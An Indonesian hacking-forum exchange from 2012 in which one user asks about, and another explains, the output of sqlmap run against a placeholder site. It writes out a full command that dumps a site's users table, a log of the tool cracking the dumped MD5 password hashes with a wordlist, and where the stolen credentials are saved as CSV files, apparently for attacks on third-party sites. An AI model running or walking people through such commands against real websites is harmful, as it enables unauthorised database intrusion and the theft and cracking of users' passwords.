03-19-2012, 08:58 PM
(03-14-2012, 11:39 AM)xombix Wrote: om mau tanya dong punya saya waktu pakeiya itu mnta persetujuan untuk decrypt,,nah nanti dilayar ditampilkan
python sqlmap.py -u http://www.xxxx.com/features/shows.php?user=11 -D xxxx -T users --dump
langsung keluar kaya gini :
Quote:[10:06:10] [INFO] analyzing table dump for possible password hashes
recognized possible password hashes in column 'user_actkey'. Do you want to crack them via a dictionary-based attack? [Y/n/q] y
[10:06:20] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/pentest/database/sqlmap/txt/wordlist.txt' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[10:06:26] [INFO] using default dictionary
[10:06:26] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[10:06:29] [INFO] starting dictionary-based cracking (md5_generic_passwd)
itu artinya sqlmap nya lagi decrypt ya om?
terus hasilnya bisa di lihat dimana ya??
misal kayak gini
username | password
admin | 098gf9807450459445fgnjf873f(admin)
berarrti admin itu crackkan md5nya
terus nanti dismpan salm format .csv di folder
misal url www.target.com
maka
sqlmap > output> www.target.com> dump>tbl_user.csv
injectkan yang bener yang mana om fake666